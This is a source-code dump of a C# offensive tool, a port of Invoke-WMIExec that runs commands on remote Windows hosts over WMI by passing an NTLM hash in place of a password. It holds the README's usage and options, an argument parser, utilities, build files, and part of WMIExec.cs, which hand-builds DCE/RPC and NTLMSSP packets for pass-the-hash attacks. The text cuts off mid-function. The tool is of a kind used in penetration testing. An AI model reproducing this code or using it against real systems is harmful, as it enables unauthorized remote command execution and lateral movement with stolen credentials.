├── Sharp-InvokeWMIExec ├── App.config ├── Properties │ └── AssemblyInfo.cs ├── ArgParse.cs ├── Utilities.cs ├── Sharp-InvokeWMIExec.csproj ├── WMIExec.cs └── Program.cs ├── Sharp-InvokeWMIExec.sln ├── README.md ├── .gitattributes └── .gitignore /Sharp-InvokeWMIExec/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /Sharp-InvokeWMIExec.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 14 4 | VisualStudioVersion = 14.0.25420.1 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Sharp-InvokeWMIExec", "Sharp-InvokeWMIExec\Sharp-InvokeWMIExec.csproj", "{0A63B0A1-7D1A-4B84-81C3-BBBFE9913029}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {0A63B0A1-7D1A-4B84-81C3-BBBFE9913029}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {0A63B0A1-7D1A-4B84-81C3-BBBFE9913029}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {0A63B0A1-7D1A-4B84-81C3-BBBFE9913029}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {0A63B0A1-7D1A-4B84-81C3-BBBFE9913029}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | EndGlobal 23 | -------------------------------------------------------------------------------- /Sharp-InvokeWMIExec/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("Sharp-InvokeWMIExec")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("Sharp-InvokeWMIExec")] 13 | [assembly: AssemblyCopyright("Copyright © 2018")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("0a63b0a1-7d1a-4b84-81c3-bbbfe9913029")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # SharpInvoke-WMIExec 2 | A native C# conversion of Kevin Robertsons Invoke-SMBExec powershell script. (https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/Invoke-WMIExec.ps1) 3 | 4 | Built for .NET 3.5 5 | 6 | # Usage 7 | Sharp-WMIExec.exe hash: username: domain: target: command: 8 | 9 | # Description 10 | This Assembly will allow you to execute a command on a target machine using WMI by providing an NTLM hash for the specified user. 11 | 12 | # Help 13 | ``` 14 | Option Description 15 | username* Username to use for authentication 16 | hash* NTLM Password hash for authentication. This module will accept either LM:NTLM or NTLM format 17 | domain Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username 18 | target Hostname or IP Address of the target. 19 | command Command to execute on the target. If a command is not specified, the function will check to see if the username and hash provide local admin access on the target 20 | -CheckAdmin Check admin access only, don't execute command 21 | -Help (-h) Switch, Enabled debugging [Default='False'] 22 | -Debug Print Debugging Information along with output 23 | ``` 24 | -------------------------------------------------------------------------------- /Sharp-InvokeWMIExec/ArgParse.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | 6 | namespace Sharp_InvokeWMIExec 7 | { 8 | public static class ArgParse 9 | { 10 | //Argument parsing class from Rubeus (https://github.com/GhostPack/Rubeus/) 11 | //Author: @Harmj0y 12 | 13 | public static ArgumentParserResult Parse(IEnumerable args) 14 | { 15 | var arguments = new Dictionary(); 16 | try 17 | { 18 | foreach (var argument in args) 19 | { 20 | var idx = argument.IndexOf(':'); 21 | if (idx > 0) 22 | arguments[argument.Substring(0, idx).ToLower()] = argument.Substring(idx + 1); 23 | else if (argument.ToLower() == "-debug") 24 | arguments["debugging"] = "true"; 25 | else if (argument.ToLower() == "-h") 26 | arguments["showhelp"] = "true"; 27 | else if (argument.ToLower() == "-help") 28 | arguments["showhelp"] = "true"; 29 | else if (argument.ToLower() == "-checkadmin") 30 | arguments["admincheck"] = "true"; 31 | else 32 | arguments[argument] = string.Empty; 33 | } 34 | 35 | return ArgumentParserResult.Success(arguments); 36 | } 37 | catch (System.Exception ex) 38 | { 39 | Console.WriteLine(ex.Message); 40 | return ArgumentParserResult.Failure(); 41 | } 42 | } 43 | } 44 | public class ArgumentParserResult 45 | { 46 | public bool ParsedOk { get; } 47 | public Dictionary Arguments { get; } 48 | 49 | private ArgumentParserResult(bool parsedOk, Dictionary arguments) 50 | { 51 | ParsedOk = parsedOk; 52 | Arguments = arguments; 53 | } 54 | 55 | public static ArgumentParserResult Success(Dictionary arguments) 56 | => new ArgumentParserResult(true, arguments); 57 | 58 | public static ArgumentParserResult Failure() 59 | => new ArgumentParserResult(false, null); 60 | 61 | } 62 | } 63 | -------------------------------------------------------------------------------- /.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 53 | ############################################################################### 54 | #*.doc diff=astextplain 55 | #*.DOC diff=astextplain 56 | #*.docx diff=astextplain 57 | #*.DOCX diff=astextplain 58 | #*.dot diff=astextplain 59 | #*.DOT diff=astextplain 60 | #*.pdf diff=astextplain 61 | #*.PDF diff=astextplain 62 | #*.rtf diff=astextplain 63 | #*.RTF diff=astextplain 64 | -------------------------------------------------------------------------------- /Sharp-InvokeWMIExec/Utilities.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections; 3 | using System.Collections.Generic; 4 | using System.Collections.Specialized; 5 | using System.Linq; 6 | using System.Net.Sockets; 7 | using System.Text; 8 | 9 | namespace Sharp_InvokeWMIExec 10 | { 11 | class Utilities 12 | { 13 | public static byte[] GetByteRange(byte[] array, int start, int end) 14 | { 15 | var newArray = array.Skip(start).Take(end - start + 1).ToArray(); 16 | return newArray; 17 | } 18 | static public byte[] CombineByteArray(byte[] a, byte[] b) 19 | { 20 | byte[] c = new byte[a.Length + b.Length]; 21 | Buffer.BlockCopy(a, 0, c, 0, a.Length); 22 | Buffer.BlockCopy(b, 0, c, a.Length, b.Length); 23 | return c; 24 | } 25 | public static byte[] StringToByteArray(string hex) 26 | { 27 | return Enumerable.Range(0, hex.Length) 28 | .Where(x => x % 2 == 0) 29 | .Select(x => Convert.ToByte(hex.Substring(x, 2), 16)) 30 | .ToArray(); 31 | } 32 | public static byte[] ConvertFromPacketOrderedDictionary(OrderedDictionary packet_ordered_dictionary) 33 | { 34 | List byte_list = new List(); 35 | foreach (DictionaryEntry de in packet_ordered_dictionary) 36 | { 37 | byte_list.Add(de.Value as byte[]); 38 | } 39 | 40 | var flattenedList = byte_list.SelectMany(bytes => bytes); 41 | byte[] byte_Array = flattenedList.ToArray(); 42 | 43 | return byte_Array; 44 | } 45 | public static ushort DataLength(int length_start, byte[] string_extract_data) 46 | { 47 | byte[] bytes = { string_extract_data[length_start], string_extract_data[length_start + 1] }; 48 | ushort string_length = BitConverter.ToUInt16(Utilities.GetByteRange(string_extract_data, length_start, length_start + 1), 0); 49 | //string_length = ConvertToUint16(array[arraystart to arraystart +1 50 | 51 | return string_length; 52 | } 53 | public static byte[] ConvertStringToByteArray(string hex) 54 | { 55 | return Enumerable.Range(0, hex.Length) 56 | .Where(x => x % 2 == 0) 57 | .Select(x => Convert.ToByte(hex.Substring(x, 2), 16)) 58 | .ToArray(); 59 | } 60 | public static byte[] SendStream(NetworkStream stream, byte[] BytesToSend) 61 | { 62 | byte[] BytesReceived = new byte[2048]; 63 | stream.Write(BytesToSend, 0, BytesToSend.Length); 64 | stream.Flush(); 65 | stream.Read(BytesReceived, 0, BytesReceived.Length); 66 | return BytesReceived; 67 | } 68 | } 69 | } 70 | -------------------------------------------------------------------------------- /Sharp-InvokeWMIExec/Sharp-InvokeWMIExec.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {0A63B0A1-7D1A-4B84-81C3-BBBFE9913029} 8 | Exe 9 | Properties 10 | Sharp_InvokeWMIExec 11 | Sharp-WMIExec 12 | v3.5 13 | 512 14 | true 15 | 16 | 17 | 18 | AnyCPU 19 | true 20 | full 21 | false 22 | bin\Debug\ 23 | DEBUG;TRACE 24 | prompt 25 | 4 26 | false 27 | 28 | 29 | AnyCPU 30 | pdbonly 31 | true 32 | bin\Release\ 33 | TRACE 34 | prompt 35 | 4 36 | false 37 | 38 | 39 | 40 | ..\packages\Mono.Options.5.3.0.1\lib\net4-client\Mono.Options.dll 41 | 42 | 43 | ..\packages\PowerArgs.Dev.2.7.1.0\lib\net45\PowerArgs.dll 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 72 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | 4 | # User-specific files 5 | *.suo 6 | *.user 7 | *.userosscache 8 | *.sln.docstates 9 | 10 | # User-specific files (MonoDevelop/Xamarin Studio) 11 | *.userprefs 12 | 13 | # Build results 14 | [Dd]ebug/ 15 | [Dd]ebugPublic/ 16 | [Rr]elease/ 17 | [Rr]eleases/ 18 | [Xx]64/ 19 | [Xx]86/ 20 | [Bb]uild/ 21 | bld/ 22 | [Bb]in/ 23 | [Oo]bj/ 24 | 25 | # Visual Studio 2015 cache/options directory 26 | .vs/ 27 | # Uncomment if you have tasks that create the project's static files in wwwroot 28 | #wwwroot/ 29 | 30 | # MSTest test Results 31 | [Tt]est[Rr]esult*/ 32 | [Bb]uild[Ll]og.* 33 | 34 | # NUNIT 35 | *.VisualState.xml 36 | TestResult.xml 37 | 38 | # Build Results of an ATL Project 39 | [Dd]ebugPS/ 40 | [Rr]eleasePS/ 41 | dlldata.c 42 | 43 | # DNX 44 | project.lock.json 45 | artifacts/ 46 | 47 | *_i.c 48 | *_p.c 49 | *_i.h 50 | *.ilk 51 | *.meta 52 | *.obj 53 | *.pch 54 | *.pdb 55 | *.pgc 56 | *.pgd 57 | *.rsp 58 | *.sbr 59 | *.tlb 60 | *.tli 61 | *.tlh 62 | *.tmp 63 | *.tmp_proj 64 | *.log 65 | *.vspscc 66 | *.vssscc 67 | .builds 68 | *.pidb 69 | *.svclog 70 | *.scc 71 | 72 | # Chutzpah Test files 73 | _Chutzpah* 74 | 75 | # Visual C++ cache files 76 | ipch/ 77 | *.aps 78 | *.ncb 79 | *.opendb 80 | *.opensdf 81 | *.sdf 82 | *.cachefile 83 | *.VC.db 84 | 85 | # Visual Studio profiler 86 | *.psess 87 | *.vsp 88 | *.vspx 89 | *.sap 90 | 91 | # TFS 2012 Local Workspace 92 | $tf/ 93 | 94 | # Guidance Automation Toolkit 95 | *.gpState 96 | 97 | # ReSharper is a .NET coding add-in 98 | _ReSharper*/ 99 | *.[Rr]e[Ss]harper 100 | *.DotSettings.user 101 | 102 | # JustCode is a .NET coding add-in 103 | .JustCode 104 | 105 | # TeamCity is a build add-in 106 | _TeamCity* 107 | 108 | # DotCover is a Code Coverage Tool 109 | *.dotCover 110 | 111 | # NCrunch 112 | _NCrunch_* 113 | .*crunch*.local.xml 114 | nCrunchTemp_* 115 | 116 | # MightyMoose 117 | *.mm.* 118 | AutoTest.Net/ 119 | 120 | # Web workbench (sass) 121 | .sass-cache/ 122 | 123 | # Installshield output folder 124 | [Ee]xpress/ 125 | 126 | # DocProject is a documentation generator add-in 127 | DocProject/buildhelp/ 128 | DocProject/Help/*.HxT 129 | DocProject/Help/*.HxC 130 | DocProject/Help/*.hhc 131 | DocProject/Help/*.hhk 132 | DocProject/Help/*.hhp 133 | DocProject/Help/Html2 134 | DocProject/Help/html 135 | 136 | # Click-Once directory 137 | publish/ 138 | 139 | # Publish Web Output 140 | *.[Pp]ublish.xml 141 | *.azurePubxml 142 | 143 | # TODO: Un-comment the next line if you do not want to checkin 144 | # your web deploy settings because they may include unencrypted 145 | # passwords 146 | #*.pubxml 147 | *.publishproj 148 | 149 | # NuGet Packages 150 | *.nupkg 151 | # The packages folder can be ignored because of Package Restore 152 | **/packages/* 153 | # except build/, which is used as an MSBuild target. 154 | !**/packages/build/ 155 | # Uncomment if necessary however generally it will be regenerated when needed 156 | #!**/packages/repositories.config 157 | # NuGet v3's project.json files produces more ignoreable files 158 | *.nuget.props 159 | *.nuget.targets 160 | 161 | # Microsoft Azure Build Output 162 | csx/ 163 | *.build.csdef 164 | 165 | # Microsoft Azure Emulator 166 | ecf/ 167 | rcf/ 168 | 169 | # Microsoft Azure ApplicationInsights config file 170 | ApplicationInsights.config 171 | 172 | # Windows Store app package directory 173 | AppPackages/ 174 | BundleArtifacts/ 175 | 176 | # Visual Studio cache files 177 | # files ending in .cache can be ignored 178 | *.[Cc]ache 179 | # but keep track of directories ending in .cache 180 | !*.[Cc]ache/ 181 | 182 | # Others 183 | ClientBin/ 184 | [Ss]tyle[Cc]op.* 185 | ~$* 186 | *~ 187 | *.dbmdl 188 | *.dbproj.schemaview 189 | *.pfx 190 | *.publishsettings 191 | node_modules/ 192 | orleans.codegen.cs 193 | 194 | # RIA/Silverlight projects 195 | Generated_Code/ 196 | 197 | # Backup & report files from converting an old project file 198 | # to a newer Visual Studio version. Backup files are not needed, 199 | # because we have git ;-) 200 | _UpgradeReport_Files/ 201 | Backup*/ 202 | UpgradeLog*.XML 203 | UpgradeLog*.htm 204 | 205 | # SQL Server files 206 | *.mdf 207 | *.ldf 208 | 209 | # Business Intelligence projects 210 | *.rdl.data 211 | *.bim.layout 212 | *.bim_*.settings 213 | 214 | # Microsoft Fakes 215 | FakesAssemblies/ 216 | 217 | # GhostDoc plugin setting file 218 | *.GhostDoc.xml 219 | 220 | # Node.js Tools for Visual Studio 221 | .ntvs_analysis.dat 222 | 223 | # Visual Studio 6 build log 224 | *.plg 225 | 226 | # Visual Studio 6 workspace options file 227 | *.opt 228 | 229 | # Visual Studio LightSwitch build output 230 | **/*.HTMLClient/GeneratedArtifacts 231 | **/*.DesktopClient/GeneratedArtifacts 232 | **/*.DesktopClient/ModelManifest.xml 233 | **/*.Server/GeneratedArtifacts 234 | **/*.Server/ModelManifest.xml 235 | _Pvt_Extensions 236 | 237 | # LightSwitch generated files 238 | GeneratedArtifacts/ 239 | ModelManifest.xml 240 | 241 | # Paket dependency manager 242 | .paket/paket.exe 243 | 244 | # FAKE - F# Make 245 | .fake/ -------------------------------------------------------------------------------- /Sharp-InvokeWMIExec/WMIExec.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Collections.Specialized; 4 | using System.Linq; 5 | using System.Text; 6 | 7 | namespace Sharp_InvokeWMIExec 8 | { 9 | public class WMIExec 10 | { 11 | ///

12 | /// WMIExec contains all of the functions used to manually create SMB Packet Structures for Pass the Hash attacks. 13 | ///

14 | /// 15 | /// Based Heavily on Kevin Robertsons Invoke-TheHash toolset (Found 16 | /// at https://github.com/Kevin-Robertson/Invoke-TheHash) 17 | /// 18 | 19 | public static OrderedDictionary RPCBind(int packet_call_ID, byte[] packet_max_frag, byte[] packet_num_ctx_items, byte[] packet_context_ID, byte[] packet_UUID, byte[] packet_UUID_version) 20 | { 21 | 22 | byte[] packet_call_ID_bytes = BitConverter.GetBytes(packet_call_ID); 23 | 24 | OrderedDictionary packet_RPCBind = new OrderedDictionary(); 25 | packet_RPCBind.Add("RPCBind_Version", new byte[] { 0x05 }); 26 | packet_RPCBind.Add("RPCBind_VersionMinor", new byte[] { 0x00 }); 27 | packet_RPCBind.Add("RPCBind_PacketType", new byte[] { 0x0b }); 28 | packet_RPCBind.Add("RPCBind_PacketFlags", new byte[] { 0x03 }); 29 | packet_RPCBind.Add("RPCBind_DataRepresentation", new byte[] { 0x10, 0x00, 0x00, 0x00 }); 30 | packet_RPCBind.Add("RPCBind_FragLength", new byte[] { 0x48, 0x00 }); 31 | packet_RPCBind.Add("RPCBind_AuthLength", new byte[] { 0x00, 0x00 }); 32 | packet_RPCBind.Add("RPCBind_CallID", packet_call_ID_bytes); 33 | packet_RPCBind.Add("RPCBind_MaxXmitFrag", new byte[] { 0xb8, 0x10 }); 34 | packet_RPCBind.Add("RPCBind_MaxRecvFrag", new byte[] { 0xb8, 0x10 }); 35 | packet_RPCBind.Add("RPCBind_AssocGroup", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 36 | packet_RPCBind.Add("RPCBind_NumCtxItems", packet_num_ctx_items); 37 | packet_RPCBind.Add("RPCBind_Unknown", new byte[] { 0x00, 0x00, 0x00 }); 38 | packet_RPCBind.Add("RPCBind_ContextID", packet_context_ID); 39 | packet_RPCBind.Add("RPCBind_NumTransItems", new byte[] { 0x01 }); 40 | packet_RPCBind.Add("RPCBind_Unknown2", new byte[] { 0x00 }); 41 | packet_RPCBind.Add("RPCBind_Interface", packet_UUID); 42 | packet_RPCBind.Add("RPCBind_InterfaceVer", packet_UUID_version); 43 | packet_RPCBind.Add("RPCBind_InterfaceVerMinor", new byte[] { 0x00, 0x00 }); 44 | packet_RPCBind.Add("RPCBind_TransferSyntax", new byte[] { 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60 }); 45 | packet_RPCBind.Add("RPCBind_TransferSyntaxVer", new byte[] { 0x02, 0x00, 0x00, 0x00 }); 46 | 47 | 48 | if (packet_num_ctx_items[0] == 2) 49 | { 50 | packet_RPCBind.Add("RPCBind_ContextID2", new byte[] { 0x01, 0x00 }); 51 | packet_RPCBind.Add("RPCBind_NumTransItems2", new byte[] { 0x01 }); 52 | packet_RPCBind.Add("RPCBind_Unknown3", new byte[] { 0x00 }); 53 | packet_RPCBind.Add("RPCBind_Interface2", new byte[] { 0xc4, 0xfe, 0xfc, 0x99, 0x60, 0x52, 0x1b, 0x10, 0xbb, 0xcb, 0x00, 0xaa, 0x00, 0x21, 0x34, 0x7a }); 54 | packet_RPCBind.Add("RPCBind_InterfaceVer2", new byte[] { 0x00, 0x00 }); 55 | packet_RPCBind.Add("RPCBind_InterfaceVerMinor2", new byte[] { 0x00, 0x00 }); 56 | packet_RPCBind.Add("RPCBind_TransferSyntax2", new byte[] { 0x2c, 0x1c, 0xb7, 0x6c, 0x12, 0x98, 0x40, 0x45, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }); 57 | packet_RPCBind.Add("RPCBind_TransferSyntaxVer2", new byte[] { 0x01, 0x00, 0x00, 0x00 }); 58 | } 59 | else if (packet_num_ctx_items[0] == 3) 60 | { 61 | packet_RPCBind.Add("RPCBind_ContextID2", new byte[] { 0x01, 0x00 }); 62 | packet_RPCBind.Add("RPCBind_NumTransItems2", new byte[] { 0x01 }); 63 | packet_RPCBind.Add("RPCBind_Unknown3", new byte[] { 0x00 }); 64 | packet_RPCBind.Add("RPCBind_Interface2", new byte[] { 0x43, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 }); 65 | packet_RPCBind.Add("RPCBind_InterfaceVer2", new byte[] { 0x00, 0x00 }); 66 | packet_RPCBind.Add("RPCBind_InterfaceVerMinor2", new byte[] { 0x00, 0x00 }); 67 | packet_RPCBind.Add("RPCBind_TransferSyntax2", new byte[] { 0x33, 0x05, 0x71, 0x71, 0xba, 0xbe, 0x37, 0x49, 0x83, 0x19, 0xb5, 0xdb, 0xef, 0x9c, 0xcc, 0x36 }); 68 | packet_RPCBind.Add("RPCBind_TransferSyntaxVer2", new byte[] { 0x01, 0x00, 0x00, 0x00 }); 69 | packet_RPCBind.Add("RPCBind_ContextID3", new byte[] { 0x02, 0x00 }); 70 | packet_RPCBind.Add("RPCBind_NumTransItems3", new byte[] { 0x01 }); 71 | packet_RPCBind.Add("RPCBind_Unknown4", new byte[] { 0x00 }); 72 | packet_RPCBind.Add("RPCBind_Interface3", new byte[] { 0x43, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 }); 73 | packet_RPCBind.Add("RPCBind_InterfaceVer3", new byte[] { 0x00, 0x00 }); 74 | packet_RPCBind.Add("RPCBind_InterfaceVerMinor3", new byte[] { 0x00, 0x00 }); 75 | packet_RPCBind.Add("RPCBind_TransferSyntax3", new byte[] { 0x2c, 0x1c, 0xb7, 0x6c, 0x12, 0x98, 0x40, 0x45, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }); 76 | packet_RPCBind.Add("RPCBind_TransferSyntaxVer3", new byte[] { 0x01, 0x00, 0x00, 0x00 }); 77 | packet_RPCBind.Add("RPCBind_AuthType", new byte[] { 0x0a }); 78 | packet_RPCBind.Add("RPCBind_AuthLevel", new byte[] { 0x04 }); 79 | packet_RPCBind.Add("RPCBind_AuthPadLength", new byte[] { 0x00 }); 80 | packet_RPCBind.Add("RPCBind_AuthReserved", new byte[] { 0x00 }); 81 | packet_RPCBind.Add("RPCBind_ContextID4", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 82 | packet_RPCBind.Add("RPCBind_Identifier", new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00 }); 83 | packet_RPCBind.Add("RPCBind_MessageType", new byte[] { 0x01, 0x00, 0x00, 0x00 }); 84 | packet_RPCBind.Add("RPCBind_NegotiateFlags", new byte[] { 0x97, 0x82, 0x08, 0xe2 }); 85 | packet_RPCBind.Add("RPCBind_CallingWorkstationDomain", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }); 86 | packet_RPCBind.Add("RPCBind_CallingWorkstationName", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }); 87 | packet_RPCBind.Add("RPCBind_OSVersion", new byte[] { 0x06, 0x01, 0xb1, 0x1d, 0x00, 0x00, 0x00, 0x0f }); 88 | } 89 | 90 | if (packet_call_ID == 3) 91 | { 92 | packet_RPCBind.Add("RPCBind_AuthType", new byte[] { 0x0a }); 93 | packet_RPCBind.Add("RPCBind_AuthLevel", new byte[] { 0x02 }); 94 | packet_RPCBind.Add("RPCBind_AuthPadLength", new byte[] { 0x00 }); 95 | packet_RPCBind.Add("RPCBind_AuthReserved", new byte[] { 0x00 }); 96 | packet_RPCBind.Add("RPCBind_ContextID3", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 97 | packet_RPCBind.Add("RPCBind_Identifier", new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00 }); 98 | packet_RPCBind.Add("RPCBind_MessageType", new byte[] { 0x01, 0x00, 0x00, 0x00 }); 99 | packet_RPCBind.Add("RPCBind_NegotiateFlags", new byte[] { 0x97, 0x82, 0x08, 0xe2 }); 100 | packet_RPCBind.Add("RPCBind_CallingWorkstationDomain", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }); 101 | packet_RPCBind.Add("RPCBind_CallingWorkstationName", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }); 102 | packet_RPCBind.Add("RPCBind_OSVersion", new byte[] { 0x06, 0x01, 0xb1, 0x1d, 0x00, 0x00, 0x00, 0x0f }); 103 | } 104 | 105 | return packet_RPCBind; 106 | } 107 | public static OrderedDictionary RPCAuth3(byte[] packet_NTLMSSP) 108 | { 109 | //4 extra bytes? 110 | byte[] packet_NTLMSSP_length = BitConverter.GetBytes(packet_NTLMSSP.Length); 111 | packet_NTLMSSP_length = new byte[] { packet_NTLMSSP_length[0], packet_NTLMSSP_length[1] }; 112 | 113 | byte[] packet_RPC_length = BitConverter.GetBytes(packet_NTLMSSP.Length + 28); 114 | packet_RPC_length = new byte[] { packet_RPC_length[0], packet_RPC_length[1] }; 115 | 116 | 117 | OrderedDictionary packet_RPCAuth3 = new OrderedDictionary(); 118 | packet_RPCAuth3.Add("RPCAUTH3_Version", new byte[] { 0x05 }); 119 | packet_RPCAuth3.Add("RPCAUTH3_VersionMinor", new byte[] { 0x00 }); 120 | packet_RPCAuth3.Add("RPCAUTH3_PacketType", new byte[] { 0x10 }); 121 | packet_RPCAuth3.Add("RPCAUTH3_PacketFlags", new byte[] { 0x03 }); 122 | packet_RPCAuth3.Add("RPCAUTH3_DataRepresentation", new byte[] { 0x10, 0x00, 0x00, 0x00 }); 123 | packet_RPCAuth3.Add("RPCAUTH3_FragLength", packet_RPC_length); 124 | packet_RPCAuth3.Add("RPCAUTH3_AuthLength", packet_NTLMSSP_length); 125 | packet_RPCAuth3.Add("RPCAUTH3_CallID", new byte[] { 0x03, 0x00, 0x00, 0x00 }); 126 | packet_RPCAuth3.Add("RPCAUTH3_MaxXmitFrag", new byte[] { 0xd0, 0x16 }); 127 | packet_RPCAuth3.Add("RPCAUTH3_MaxRecvFrag", new byte[] { 0xd0, 0x16 }); 128 | packet_RPCAuth3.Add("RPCAUTH3_AuthType", new byte[] { 0x0a }); 129 | packet_RPCAuth3.Add("RPCAUTH3_AuthLevel", new byte[] { 0x02 }); 130 | packet_RPCAuth3.Add("RPCAUTH3_AuthPadLength", new byte[] { 0x00 }); 131 | packet_RPCAuth3.Add("RPCAUTH3_AuthReserved", new byte[] { 0x00 }); 132 | packet_RPCAuth3.Add("RPCAUTH3_ContextID", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 133 | packet_RPCAuth3.Add("RPCAUTH3_NTLMSSP", packet_NTLMSSP); 134 | 135 | return packet_RPCAuth3; 136 | } 137 | public static OrderedDictionary RPCRequest(byte[] packet_flags, int packet_service_length, int packet_auth_length, int packet_auth_padding, byte[] packet_call_ID, byte[] packet_context_ID, byte[] packet_opnum, byte[] packet_data) 138 | { 139 | int packet_full_auth_length; 140 | byte[] packet_write_length; 141 | byte[] packet_alloc_hint; 142 | if (packet_auth_length > 0) 143 | { 144 | packet_full_auth_length = packet_auth_length + packet_auth_padding + 8; 145 | } 146 | else 147 | { 148 | packet_full_auth_length = 0; 149 | } 150 | 151 | 152 | if (packet_data != null) 153 | { 154 | packet_write_length = BitConverter.GetBytes(packet_service_length + 24 + packet_full_auth_length + packet_data.Length); 155 | packet_alloc_hint = BitConverter.GetBytes(packet_service_length + packet_data.Length); 156 | } 157 | else 158 | { 159 | //Doing this because sometimes he calls it with 7 params instead of 8, which Powershell outputs the length to 0. 160 | packet_write_length = BitConverter.GetBytes(packet_service_length + 24 + packet_full_auth_length); 161 | packet_alloc_hint = BitConverter.GetBytes(packet_service_length); 162 | 163 | } 164 | 165 | byte[] packet_frag_length = { packet_write_length[0], packet_write_length[1] }; 166 | byte[] packet_auth_length2 = BitConverter.GetBytes(packet_auth_length); 167 | byte[] packet_auth_length3 = { packet_auth_length2[0], packet_auth_length2[1] }; 168 | 169 | OrderedDictionary packet_RPCRequest = new OrderedDictionary(); 170 | 